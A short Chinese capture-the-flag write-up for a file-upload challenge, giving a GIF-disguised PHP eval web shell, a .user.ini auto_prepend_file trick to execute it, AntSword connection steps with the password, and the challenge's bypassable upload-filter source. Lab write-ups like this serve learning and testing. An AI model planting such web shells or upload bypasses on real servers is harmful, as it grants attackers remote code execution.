废话不多讲,老生常谈的文件上传题目
需要传一个图片马
GIF89a
<script language='php'>@eval($_POST['abc']);</script>
还有一个.user.ini文件
文件上传之.user.ini
GIF89a
auto_prepend_file=upload.jpg
作用是指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。
蚁剑链接
http://c8a6d5ca-0f52-4c27-a06f-4a0cb7cb1ee3.node4.buuoj.cn:81/uploads/cc551ab005b2e60fbdc88de809b2c4b1/index.php
并输入密码abc即可连接成功
贴上源码`
<?php
// error_reporting(0);
$userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]);
if (!file_exists($userdir)) {
mkdir($userdir, 0777, true);
}
file_put_contents($userdir . "/index.php", "");
if (isset($_POST["upload"])) {
$tmp_name = $_FILES["fileUpload"]["tmp_name"];
$name = $_FILES["fileUpload"]["name"];
if (!$tmp_name) {
die("filesize too big!");
}
if (!$name) {
die("filename cannot be empty!");
}
$extension = substr($name, strrpos($name, ".") + 1);
if (preg_match("/ph|htacess/i", $extension)) {
die("illegal suffix!");
}
if (mb_strpos(file_get_contents($tmp_name), "<?") !== FALSE) {
die("<? in contents!");
}
$image_type = exif_imagetype($tmp_name);
if (!$image_type) {
die("exif_imagetype:not image!");
}
$upload_file_path = $userdir . "/" . $name;
move_uploaded_file($tmp_name, $upload_file_path);
echo "Your dir " . $userdir. ' <br>';
echo 'Your files : <br>';
var_dump(scandir($userdir));
}
© 2022 GitHub, Inc.
Terms
Privacy
Secur